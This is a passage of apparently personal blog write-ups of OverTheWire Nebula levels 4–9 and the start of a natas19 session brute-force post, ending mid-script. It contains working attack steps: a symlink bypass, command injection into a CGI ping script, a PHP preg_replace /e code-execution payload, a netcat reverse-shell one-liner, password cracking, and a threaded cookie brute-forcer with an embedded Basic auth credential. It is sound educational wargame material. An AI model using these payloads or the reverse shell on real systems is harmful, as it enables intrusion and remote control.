<span class="w"> </span><span class="n">rc</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">rc</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">err</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">,</span><span class="w"> </span><span class="s">"Unable to read fd %d"</span><span class="p">,</span><span class="w"> </span><span class="n">fd</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">rc</span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>To bypass it, we simply create a symbolic link to the token file. The check only looks at the name passed in
<code>argv[1]</code>, while <code>open()</code> follows symbolic links:</p>
<div class="highlight"><pre><span></span><code>level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/bla
level04@nebula:/home/flag04$ ./flag04 /tmp/bla
06508b5e-8909-4f38-b630-fdb148a848a2
level04@nebula:/home/flag04$ su flag04
Password:
sh-4.2$ getflag
You have successfully executed getflag on a target account
</code></pre></div>
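<p>The weakness can be reproduced outside of the level. The following is a minimal Python sketch, not the level's code: <code>naive_check()</code> mimics the <code>strstr()</code> test on the path name, and <code>resolved_check()</code> is a hypothetical stricter variant that resolves symbolic links before testing. All function names are made up for illustration.</p>

```python
import os
import tempfile


def naive_check(path):
    """Mimic the strstr() test: accept unless the *name* contains 'token'."""
    return "token" not in path


def resolved_check(path):
    """Hypothetical stricter variant: resolve symlinks, then test the real path."""
    return "token" not in os.path.realpath(path)


def demo():
    """Return (direct access allowed, symlink allowed naively, symlink allowed after resolving)."""
    with tempfile.TemporaryDirectory() as tmp:
        token = os.path.join(tmp, "token")
        with open(token, "w") as fh:
            fh.write("secret\n")
        link = os.path.join(tmp, "bla")
        os.symlink(token, link)  # same trick as `ln -s .../token /tmp/bla`
        return naive_check(token), naive_check(link), resolved_check(link)


if __name__ == "__main__":
    print(demo())
```

<p>Resolving the path first only closes this particular hole; a check followed by a separate <code>open()</code> can still race, so opening the file with <code>O_NOFOLLOW</code> is probably the more robust direction.</p>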
<h2>Level 5 - Reading sensitive backup files to exploit accounts</h2>
<p>When you change to the home directory of <code>flag05</code>, you immediately see a suspicious directory named
<code>.backup</code>. It contains a <code>tar.gz</code> file. When you decompress and untar it, you'll see that
it contains the credentials for an SSH connection. After a few tries, you'll find that you can
log in to the flag05 account with the private key (contained in <code>.ssh/id_rsa</code>).</p>
<div class="highlight"><pre><span></span><code><span class="c1"># This command creates a temporary directory and unpacks the .tgz file there. Then it logs in with the</span>
<span class="c1"># id_rsa key which was in the compressed tar archive.</span>
<span class="nv">TEMPDIR</span><span class="o">=</span><span class="k">$(</span>mktemp -d<span class="k">)</span> <span class="o">&&</span> tar -xzvf .backup/backup-19072011.tgz -C <span class="nv">$TEMPDIR</span> <span class="o">&&</span> ssh -i <span class="nv">$TEMPDIR</span>/.ssh/id_rsa flag05@localhost <span class="s1">'getflag'</span>
</code></pre></div>
<h2>Level 6 - Cracking crypt(3)</h2>
<p>This one is fairly easy. As the level description states:</p>
<blockquote>
<p>The flag06 account credentials came from a legacy unix system. </p>
</blockquote>
<p>This just means that the hashed passwords are still stored in <code>/etc/passwd</code> and that they are hashed with
<code>crypt(3)</code>.</p>
<p>So I installed a password cracking program named <em>john</em> and downloaded the <code>/etc/passwd</code> file from nebula to my
host machine. </p>
<div class="highlight"><pre><span></span><code>scp level06@nebula:/etc/passwd passwd
</code></pre></div>
<p>Then I called john with the password file which yielded the password immediately:</p>
<div class="highlight"><pre><span></span><code>nikolai@nikolai:~/Projects/private/wargames/exploit-exercises/nebula$ john passwd
Loaded <span class="m">1</span> password <span class="nb">hash</span> <span class="o">(</span>descrypt, traditional crypt<span class="o">(</span><span class="m">3</span><span class="o">)</span> <span class="o">[</span>DES <span class="m">128</span>/128 SSE2-16<span class="o">])</span>
Press <span class="s1">'q'</span> or Ctrl-C to abort, almost any other key <span class="k">for</span> status
hello <span class="o">(</span>flag06<span class="o">)</span>
1g <span class="m">0</span>:00:00:00 <span class="m">100</span>% <span class="m">2</span>/3 <span class="m">11</span>.11g/s 8366p/s 8366c/s 8366C/s <span class="m">123456</span>..marley
Use the <span class="s2">"--show"</span> option to display all of the cracked passwords reliably
Session completed
</code></pre></div>
<p>Well the password is <strong>hello</strong> :)</p>
<div class="highlight"><pre><span></span><code><span class="c1"># enter the password 'hello'</span>
ssh flag06@nebula <span class="s1">'getflag'</span>
flag06@nebula<span class="err">'</span>s password:
You have successfully executed getflag on a target account
</code></pre></div>
<h2>Level 7 - RCE exploit in cgi files</h2>
<p>This one is quite easy. You can immediately see that there is a <strong>cgi perl</strong> script in the <code>flag07</code> directory
that exposes ping.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/perl</span>
<span class="k">use</span> <span class="nn">CGI</span> <span class="sx">qw{param}</span><span class="p">;</span>
<span class="k">print</span> <span class="s">"Content-type: text/html\n\n"</span><span class="p">;</span>
<span class="k">sub</span> <span class="nf">ping</span> <span class="p">{</span>
<span class="nv">$host</span> <span class="o">=</span> <span class="nv">$_</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="k">print</span><span class="p">(</span><span class="s">"<html><head><title>Ping results</title></head><body><pre>"</span><span class="p">);</span>
<span class="nv">@output</span> <span class="o">=</span> <span class="sb">`ping -c 3 $host 2>&1`</span><span class="p">;</span>
<span class="k">foreach</span> <span class="nv">$line</span> <span class="p">(</span><span class="nv">@output</span><span class="p">)</span> <span class="p">{</span> <span class="k">print</span> <span class="s">"$line"</span><span class="p">;</span> <span class="p">}</span>
<span class="k">print</span><span class="p">(</span><span class="s">"</pre></body></html>"</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1"># check if Host set. if not, display normal page, etc</span>
<span class="n">ping</span><span class="p">(</span><span class="n">param</span><span class="p">(</span><span class="s">"Host"</span><span class="p">));</span>
</code></pre></div>
<p>You can then access the CGI script from a browser and simply inject a command into
the <code>Host</code> parameter. Inspect the <code>thttpd.conf</code> config file to see on which port the
web server is listening (7007).
Then I did the following:</p>
<div class="highlight"><pre><span></span><code>http://192.168.56.101:7007/index.cgi?Host<span class="o">=</span><span class="k">$(</span>getflag > /tmp/getflag<span class="k">)</span>
</code></pre></div>
<p>You can then confirm that getflag was executed by reading the output file as level07:</p>
<div class="highlight"><pre><span></span><code>level07@nebula:/home/flag07$ cat /tmp/getflag
You have successfully executed getflag on a target account
</code></pre></div>
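<p>Why this works: the Perl backticks paste the <code>Host</code> parameter into a shell command line, so the shell expands <code>$(...)</code> before <code>ping</code> ever runs. The Python sketch below only builds the command strings to make that visible. The function names are made up for illustration, and <code>shlex.quote()</code> is shown as one possible mitigation, not as what the level intends.</p>

```python
import shlex


def unsafe_ping_command(host):
    # Mirrors the Perl backticks: the parameter is pasted into the shell command as-is.
    return f"ping -c 3 {host} 2>&1"


def quoted_ping_command(host):
    # shlex.quote() wraps the value so a POSIX shell treats it as one literal word.
    return f"ping -c 3 {shlex.quote(host)} 2>&1"


if __name__ == "__main__":
    payload = "$(getflag > /tmp/getflag)"
    print(unsafe_ping_command(payload))  # the shell would run getflag first
    print(quoted_ping_command(payload))  # the payload stays a plain argument
```

<p>Avoiding the shell entirely (passing an argument list instead of a command string) would sidestep the problem as well.</p>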
<h2>Level 8 - Reading and understanding pcap files!</h2>
<p>This level was quite tricky and a lot of fun to solve. You can find a file named <code>capture.pcap</code> in
the <code>flag08</code> directory. Download it to your host (with scp for instance) and open the pcap file with wireshark:</p>
<div class="highlight"><pre><span></span><code>wireshark -r capture.pcap
</code></pre></div>
<p>Then right click on a packet and select <em>Follow TCP Stream</em>. You will see something like the following:</p>
<p><img alt="wireshark screenshot" src="https://incolumitas.com/images/nebula_level08.png"> </p>
<p>We can see that the capture contains the network stream of someone trying to log in with the username <em>level08</em> and
a password with some special bytes in it: <code>0x7f</code>. A quick lookup in an ASCII table confirms that
<code>0x7f</code> is the control code for the <em>DEL (delete)</em> character. Each DEL removes the character typed just before it, so the overall password is: <strong>backd00Rmate</strong></p>
<p>Then you can log in to flag08 with this password and execute <code>getflag</code>.</p>
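<p>Replaying the deletes by hand is error-prone, so here is a small Python sketch that does it. The keystroke sequence in <code>captured</code> is an assumption: it is my reading of the TCP stream in the screenshot, so verify it against your own capture.</p>

```python
DEL = "\x7f"  # ASCII delete, shown as a dot in Wireshark's stream view


def apply_deletes(keystrokes):
    """Replay a keystroke stream, letting each DEL erase the previous character."""
    typed = []
    for ch in keystrokes:
        if ch == DEL:
            if typed:  # ignore a DEL on an empty line
                typed.pop()
        else:
            typed.append(ch)
    return "".join(typed)


if __name__ == "__main__":
    # Assumed keystrokes as read from the capture; not taken from the text above.
    captured = "backdoor" + DEL * 3 + "00Rm8" + DEL + "ate"
    print(apply_deletes(captured))
```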
<h2>Level 9 - The evil <code>/e</code> in PHP regular expressions: e(PREG_REPLACE_EVAL)</h2>
<p>We have a PHP script that is probably executed by the <code>flag09</code> binary in <code>/home/flag09</code>.</p>
<p>The script contains the following code:</p>
<div class="highlight"><pre><span></span><code><span class="cp"><?php</span>
<span class="k">function</span> <span class="nf">spam</span><span class="p">(</span><span class="nv">$email</span><span class="p">)</span>
<span class="p">{</span>
<span class="nv">$email</span> <span class="o">=</span> <span class="nb">preg_replace</span><span class="p">(</span><span class="s2">"/\./"</span><span class="p">,</span> <span class="s2">" dot "</span><span class="p">,</span> <span class="nv">$email</span><span class="p">);</span>
<span class="nv">$email</span> <span class="o">=</span> <span class="nb">preg_replace</span><span class="p">(</span><span class="s2">"/@/"</span><span class="p">,</span> <span class="s2">" AT "</span><span class="p">,</span> <span class="nv">$email</span><span class="p">);</span>
<span class="k">return</span> <span class="nv">$email</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">function</span> <span class="nf">markup</span><span class="p">(</span><span class="nv">$filename</span><span class="p">,</span> <span class="nv">$use_me</span><span class="p">)</span>
<span class="p">{</span>
<span class="nv">$contents</span> <span class="o">=</span> <span class="nb">file_get_contents</span><span class="p">(</span><span class="nv">$filename</span><span class="p">);</span>
<span class="nv">$contents</span> <span class="o">=</span> <span class="nb">preg_replace</span><span class="p">(</span><span class="s2">"/(\[email (.*)\])/e"</span><span class="p">,</span> <span class="s2">"spam(</span><span class="se">\"\\</span><span class="s2">2</span><span class="se">\"</span><span class="s2">)"</span><span class="p">,</span> <span class="nv">$contents</span><span class="p">);</span>
<span class="nv">$contents</span> <span class="o">=</span> <span class="nb">preg_replace</span><span class="p">(</span><span class="s2">"/\[/"</span><span class="p">,</span> <span class="s2">"<"</span><span class="p">,</span> <span class="nv">$contents</span><span class="p">);</span>
<span class="nv">$contents</span> <span class="o">=</span> <span class="nb">preg_replace</span><span class="p">(</span><span class="s2">"/\]/"</span><span class="p">,</span> <span class="s2">">"</span><span class="p">,</span> <span class="nv">$contents</span><span class="p">);</span>
<span class="k">return</span> <span class="nv">$contents</span><span class="p">;</span>
<span class="p">}</span>
<span class="nv">$output</span> <span class="o">=</span> <span class="nx">markup</span><span class="p">(</span><span class="nv">$argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="nv">$argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span>
<span class="k">print</span> <span class="nv">$output</span><span class="p">;</span>
<span class="cp">?></span><span class="x"></span>
</code></pre></div>
<p>This was also a very nice level. The code even has a variable named <code>$use_me</code> that helps in
exploiting the bug. </p>
<p>To exploit it, I created a file named <code>/tmp/testfile</code> with the below contents. Then I proceeded to call the setuid binary:</p>
<div class="highlight"><pre><span></span><code>level09@nebula:/home/flag09$ cat /tmp/testfile
<span class="o">[</span>email <span class="o">{</span><span class="si">${</span><span class="nv">eval</span><span class="p">(system(</span><span class="nv">$use_me</span><span class="p">))</span><span class="si">}</span><span class="o">}]</span>
level09@nebula:/home/flag09$ ./flag09 /tmp/testfile <span class="s1">'getflag > /tmp/flagged'</span>
PHP Notice: Undefined variable: <span class="k">in</span> /home/flag09/flag09.php<span class="o">(</span><span class="m">15</span><span class="o">)</span> : regexp code on line <span class="m">1</span>
level09@nebula:/home/flag09$ cat /tmp/flagged
You have successfully executed getflag on a target account
</code></pre></div>
<p>How it works: First for the basic understanding read <a href="http://php.net/manual/en/reference.pcre.pattern.modifiers.php">http://php.net/manual/en/reference.pcre.pattern.modifiers.php</a>.</p>
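<p>After having read it, we know that with the <code>/e</code> modifier <code>preg_replace()</code> first substitutes the backreferences into the replacement string and then evaluates the result as PHP code.
Here the replacement is a call to <code>spam()</code>, and through the reference <code>\2</code> we control what ends up inside its double-quoted argument. PHP expands <code>{${...}}</code> expressions inside double-quoted strings, so our expression is executed.</p>
<p>So we can run a shell command from PHP with a function like <code>system()</code>. This is where the second parameter <code>$use_me</code> comes in: it carries the command.</p>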
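<p>For readers who do not know PHP, the same class of bug can be sketched in Python. This is only an analogy under stated assumptions: Python has no <code>/e</code> modifier, so the hypothetical <code>markup_eval()</code> below builds a code string from the captured group and passes it to <code>eval()</code>, with an f-string standing in for PHP's double-quoted string expansion.</p>

```python
import re


def spam(email):
    """Python counterpart of the PHP spam() helper."""
    return email.replace(".", " dot ").replace("@", " AT ")


def markup_eval(contents, use_me):
    """Hypothetical analogue of preg_replace(.../e): evaluate code built from the match."""

    def repl(match):
        # Attacker-controlled text is pasted into source code, then evaluated.
        code = 'spam(f"' + match.group(2) + '")'
        return str(eval(code, {"spam": spam, "use_me": use_me}))

    return re.sub(r"(\[email (.*)\])", repl, contents)


if __name__ == "__main__":
    print(markup_eval("[email a.b@c]", "unused"))           # intended use
    print(markup_eval("[email {use_me.upper()}]", "pwned"))  # injected expression runs
```

<p>The second call shows the point: the file content decides which expression is evaluated, and the second argument is available to it, just like <code>$use_me</code> in the PHP script.</p>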
<p>For a POC, I just redirected the
contents of <code>getflag</code> to the file <code>/tmp/flagged</code>. But of course we could execute any command, like opening a backdoor shell with
a <code>$use_me</code> parameter like: <code>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f</code></p>Solution for wargame natas192015-09-15T10:59:00+02:002015-09-15T10:59:00+02:00Nikolai Tschachertag:incolumitas.com,2015-09-15:/2015/09/15/solution-for-wargame-natas19/<h2>Hi everyone</h2>
<p>I am still trying to solve wargames on
<a href="http://overthewire.org">overthewire</a>. Level 19 proved to be very
similar to level 18, where the server-side code looks something like the
following:</p>
<div class="highlight"><pre><span></span><code><span class="cp"><?</span>
<span class="nv">$maxid</span> <span class="o">=</span> <span class="mi">640</span><span class="p">;</span> <span class="c1">// 640 should be enough for everyone</span>
<span class="k">function</span> <span class="nf">isValidAdminLogin</span><span class="p">()</span> <span class="p">{</span> <span class="cm">/* {{{ */</span>
<span class="k">if</span><span class="p">(</span><span class="nv">$_REQUEST</span><span class="p">[</span><span class="s2">"username"</span><span class="p">]</span> <span class="o">==</span> <span class="s2">"admin"</span><span class="p">)</span> <span class="p">{</span>
<span class="cm">/* This method of authentication appears to be unsafe and has been disabled for now. */</span>
<span class="c1">//return 1;</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="cm">/* }}} */</span>
<span class="k">function</span> <span class="nf">isValidID</span><span class="p">(</span><span class="nv">$id</span><span class="p">)</span> <span class="p">{</span> <span class="cm">/* {{{ */</span>
<span class="k">return</span> <span class="nb">is_numeric</span><span class="p">(</span><span class="nv">$id</span><span class="p">);</span>
<span class="p">}</span>
<span class="cm">/* }}} */</span>
<span class="k">function</span> <span class="nf">createID</span><span class="p">(</span><span class="nv">$user</span><span class="p">)</span> <span class="p">{</span> <span class="cm">/* {{{ */</span>
<span class="k">global</span> <span class="nv">$maxid</span><span class="p">;</span>
<span class="k">return</span> <span class="nb">rand</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="nv">$maxid</span><span class="p">);</span>
<span class="p">}</span>
<span class="cm">/* }}} */</span>
<span class="k">function</span> <span class="nf">debug</span><span class="p">(</span><span class="nv">$msg</span><span class="p">)</span> <span class="p">{</span> <span class="cm">/* {{{ */</span>
<span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"debug"</span><span class="p">,</span> <span class="nv">$_GET</span><span class="p">))</span> <span class="p">{</span>
<span class="k">print</span> <span class="s2">"DEBUG: </span><span class="si">$msg</span><span class="s2">"</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="cm">/* }}} */</span>
<span class="k">function</span> <span class="nf">my_session_start</span><span class="p">()</span> <span class="p">{</span> <span class="cm">/* {{{ */</span>
<span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"PHPSESSID"</span><span class="p">,</span> <span class="nv">$_COOKIE</span><span class="p">)</span> <span class="k">and</span> <span class="nx">isValidID</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s2">"PHPSESSID"</span><span class="p">]))</span> <span class="p">{</span>
<span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">session_start</span><span class="p">())</span> <span class="p">{</span>
<span class="nx">debug</span><span class="p">(</span><span class="s2">"Session start failed"</span><span class="p">);</span>
<span class="k">return</span> <span class="k">false</span><span class="p">;</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nx">debug</span><span class="p">(</span><span class="s2">"Session start ok"</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"admin"</span><span class="p">,</span> <span class="nv">$_SESSION</span><span class="p">))</span> <span class="p">{</span>
<span class="nx">debug</span><span class="p">(</span><span class="s2">"Session was old: admin flag set"</span><span class="p">);</span>
<span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"admin"</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">// backwards compatible, secure</span>
<span class="p">}</span>
<span class="k">return</span> <span class="k">true</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="k">false</span><span class="p">;</span>
<span class="p">}</span>
<span class="cm">/* }}} */</span>
<span class="k">function</span> <span class="nf">print_credentials</span><span class="p">()</span> <span class="p">{</span> <span class="cm">/* {{{ */</span>
<span class="k">if</span><span class="p">(</span><span class="nv">$_SESSION</span> <span class="k">and</span> <span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"admin"</span><span class="p">,</span> <span class="nv">$_SESSION</span><span class="p">)</span> <span class="k">and</span> <span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"admin"</span><span class="p">]</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="k">print</span> <span class="s2">"You are an admin. The credentials for the next level are:"</span><span class="p">;</span>
<span class="k">print</span> <span class="s2">"Username: natas19n"</span><span class="p">;</span>
<span class="k">print</span> <span class="s2">"Password: "</span><span class="p">;</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="k">print</span> <span class="s2">"You are logged in as a regular user. Login as an admin to retrieve credentials for natas19."</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="cm">/* }}} */</span>
<span class="nv">$showform</span> <span class="o">=</span> <span class="k">true</span><span class="p">;</span>
<span class="k">if</span><span class="p">(</span><span class="nx">my_session_start</span><span class="p">())</span> <span class="p">{</span>
<span class="nx">print_credentials</span><span class="p">();</span>
<span class="nv">$showform</span> <span class="o">=</span> <span class="k">false</span><span class="p">;</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"username"</span><span class="p">,</span> <span class="nv">$_REQUEST</span><span class="p">)</span> <span class="o">&&</span>
<span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"password"</span><span class="p">,</span> <span class="nv">$_REQUEST</span><span class="p">))</span> <span class="p">{</span>
<span class="nb">session_id</span><span class="p">(</span><span class="nx">createID</span><span class="p">(</span><span class="nv">$_REQUEST</span><span class="p">[</span><span class="s2">"username"</span><span class="p">]));</span>
<span class="nb">session_start</span><span class="p">();</span>
<span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"admin"</span><span class="p">]</span> <span class="o">=</span> <span class="nx">isValidAdminLogin</span><span class="p">();</span>
<span class="nx">debug</span><span class="p">(</span><span class="s2">"New session started"</span><span class="p">);</span>
<span class="nv">$showform</span> <span class="o">=</span> <span class="k">false</span><span class="p">;</span>
<span class="nx">print_credentials</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span><span class="p">(</span><span class="nv">$showform</span><span class="p">)</span> <span class="p">{</span>
<span class="cp">?></span><span class="x"></span>
<span class="x">Please login with your admin account to retrieve credentials for</span>
<span class="x">natas19.</span>
<span class="x"><form action="index.php" method="POST"></span>
<span class="x">Username: <input name="username"></span>
<span class="x">Password: <input name="password"></span>
<span class="x"><input type="submit" value="Login"></input></span>
<span class="x"></form></span>
<span class="cp"><?</span> <span class="p">}</span> <span class="cp">?></span><span class="x"></span>
</code></pre></div>
<p>Assuming <code>register_globals</code> is off in <code>php.ini</code>, we cannot
inject values to alter the logic of the code. Furthermore,
<code>isValidAdminLogin()</code> always returns 0 and never the 1 we are aiming for.
But we immediately see that session IDs are drawn from a fixed,
small range: </p>
<div class="highlight"><pre><span></span><code>function createID($user) { /* {{{ */
    global $maxid; // maxid = 640
    return rand(1, $maxid);
}
</code></pre></div>
<p>So we can just try brute forcing all cookies from 1 to 640 and we will
soon be admin.</p>
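<p>The brute-force idea can be sketched in a few lines of Python. This is only a sketch under assumptions: <code>find_admin_session</code> and its <code>fetch</code> parameter are hypothetical names, the IDs are assumed to be sent as plain decimal strings in <code>PHPSESSID</code>, and a hit is assumed to be any response that lacks the "regular user" message.</p>

```python
REGULAR_USER_MARKER = "You are logged in as a regular user."


def find_admin_session(fetch, max_id=640):
    """Try every session ID from 1 to max_id and return the first admin one.

    `fetch` is a hypothetical callable that takes a cookie dict and returns
    the response body as a string, so the search logic stays testable
    without touching the network.
    """
    for sid in range(1, max_id + 1):
        body = fetch({"PHPSESSID": str(sid)})
        # Assumption: every non-admin session shows the regular-user message.
        if REGULAR_USER_MARKER not in body:
            return sid
    return None


# Possible wiring with the requests library (URL and auth are placeholders):
#   import requests
#   fetch = lambda cookies: requests.get(URL, cookies=cookies, auth=AUTH).text
#   print(find_admin_session(fetch))
```

<p>Passing the HTTP call in as a function keeps the loop itself trivial and makes it easy to swap in threads or a session object later.</p>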
<p>Level 19 has very similar code, but the cookie is generated in a
slightly more complex way. First I tried some login attempts with different username/password
combinations:</p>
<p><code>blabla:blabla -> PHPSESSID=3235392d 626c61 626c61; path=/; HttpOnly</code><br>
<code>blublu:blublu -> PHPSESSID=3436382d 626c75 626c75; path=/; HttpOnly</code><br>
<code>admin:AAAAAAAAAAAA -> PHPSESSID=3538322d 61646d696e; path=/; HttpOnly</code></p>
<p>We see that the trailing part of each cookie looks like hex-encoded ASCII. We can decode
this with Python:</p>
<p><code>''.join([chr(i) for i in (0x62, 0x6c, 0x61)]) == 'bla'</code><br>
<code>''.join([chr(i) for i in (0x61, 0x64, 0x6d, 0x69, 0x6e)]) == 'admin'</code></p>
<p>Assuming the valid IDs are still in the range 1-640, I need to figure
out where the ID is hidden in the cookie. It seems the username is
just appended at the end of the cookie as a hex-encoded ASCII string. So we need to
set it to '61646d696e' for admin. The first three bytes are probably the
ID, because they decode to ASCII digits (for example, 323539 is '259'), followed by 2d, which is a hyphen.</p>
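<p>To check this reading of the cookie, the captured values can be decoded directly. A minimal sketch, assuming the cookie is nothing more than the hex encoding of <code>ID-username</code>; the function name <code>decode_session_cookie</code> is made up for illustration.</p>

```python
def decode_session_cookie(hex_value):
    """Split a hex-encoded PHPSESSID into (session_id, username).

    Assumes the decoded text has the form '<digits>-<username>'.
    """
    # The captured cookies are shown with spaces for readability; drop them.
    text = bytes.fromhex(hex_value.replace(" ", "")).decode("ascii")
    session_id, _, username = text.partition("-")
    return session_id, username


for cookie in ("3235392d 626c61 626c61",
               "3436382d 626c75 626c75",
               "3538322d 61646d696e"):
    print(decode_session_cookie(cookie))
```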
<p>Overall cookie format:<br>
<code>NUM NUM NUM HYPHEN/- USERNAME</code></p>
<p>Examples before hex encoding:<br>
<code>123-admin</code>, <code>001-admin</code>, <code>012-admin</code>, <code>640-admin</code></p>
<p>The solution to crack the code:</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/python</span>
<span class="sd">"""</span>
<span class="sd">blabla:blabla -> PHPSESSID=3235392d 626c61 626c61; path=/; HttpOnly</span>
<span class="sd">blublu:blublu -> PHPSESSID=3436382d 626c75 626c75; path=/; HttpOnly</span>
<span class="sd">admin:AAAAAAAAAAAA -> PHPSESSID=3538322d 61646d696e; path=/; HttpOnly</span>
<span class="sd">We see that the last bytes seem to look like hex values:</span>
<span class="sd">''.join([chr(i) for i in (0x62, 0x6c, 0x61)]) == 'bla'</span>
<span class="sd">''.join([chr(i) for i in (0x61, 0x64, 0x6d, 0x69, 0x6e)]) == 'admin'</span>
<span class="sd">Assuming the valid IDs are still in the range 1-640, I need to figure </span>
<span class="sd">out where the id is hidden in the cookie. Seems like the username is just </span>
<span class="sd">appended at the end of the cookie as ascii string. So we need to set it to </span>
<span class="sd">'61646d696e' for admin. The first three bytes are probably the ID, because</span>
<span class="sd">the ascii values are all numbers.</span>
<span class="sd">Format:</span>
<span class="sd">NUM NUM NUM HYPHEN/- USERNAME</span>
<span class="sd">Examples without ASCII encoding:</span>
<span class="sd">123-admin</span>
<span class="sd">001-admin</span>
<span class="sd">012-admin</span>
<span class="sd">640-admin</span>
<span class="sd">"""</span>
<span class="kn">import</span> <span class="nn">threading</span>
<span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">binascii</span>
<span class="n">DEBUG</span> <span class="o">=</span> <span class="kc">True</span>
<span class="k">class</span> <span class="nc">Bruter</span><span class="p">(</span><span class="n">threading</span><span class="o">.</span><span class="n">Thread</span><span class="p">):</span>
    <span class="n">username</span> <span class="o">=</span> <span class="s1">'admin'</span>
    <span class="n">url</span> <span class="o">=</span> <span class="s1">'http://natas19.natas.labs.overthewire.org/index.php'</span>
    <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span>
        <span class="s1">'Authorization'</span><span class="p">:</span> <span class="s1">'Basic bmF0YXMxOTo0SXdJcmVrY3VabEE5T3NqT2tvVXR3VTZsaG9rQ1BZcw=='</span><span class="p">,</span>
    <span class="p">}</span>

    <span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="nb">super</span><span class="p">(</span><span class="n">Bruter</span><span class="p">,</span> <span class="bp">self</span><span class="p">)</span><span class="o">.</span><span class="fm">__init__</span><span class="p">()</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">sids</span> <span class="o">=</span> <span class="p">[]</span>

    <span class="k">def</span> <span class="nf">stoa</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span>
        <span class="c1"># hexlify() takes and returns bytes in Python 3, so convert both ways</span>
        <span class="k">return</span> <span class="n">binascii</span><span class="o">.</span><span class="n">hexlify</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">value</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s1">'ascii'</span><span class="p">))</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s1">'ascii'</span><span class="p">)</span>

    <span class="k">def</span> <span class="nf">run</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">for</span> <span class="nb">id</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">sids</span><span class="p">:</span>
            <span class="n">session_id</span> <span class="o">=</span> <span class="s1">'PHPSESSID='</span> <span class="o">+</span> <span class="bp">self</span><span class="o">.</span><span class="n">stoa</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="nb">id</span><span class="p">)</span><span class="o">.</span><span class="n">zfill</span><span class="p">(</span><span class="mi">3</span><span class="p">))</span> <span class="o">+</span> <span class="bp">self</span><span class="o">.</span><span class="n">stoa</span><span class="p">(</span><span class="s1">'-'</span><span class="p">)</span> <span class="o">+</span> <span class="bp">self</span><span class="o">.</span><span class="n">stoa</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">username</span><span class="p">)</span>
            <span class="c1"># copy the class-level dict: it is shared by all threads</span>
            <span class="n">headers</span> <span class="o">=</span> <span class="nb">dict</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">headers</span><span class="p">,</span> <span class="n">Cookie</span><span class="o">=</span><span class="n">session_id</span><span class="p">)</span>
            <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">url</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span><span class="o">.</span><span class="n">text</span>
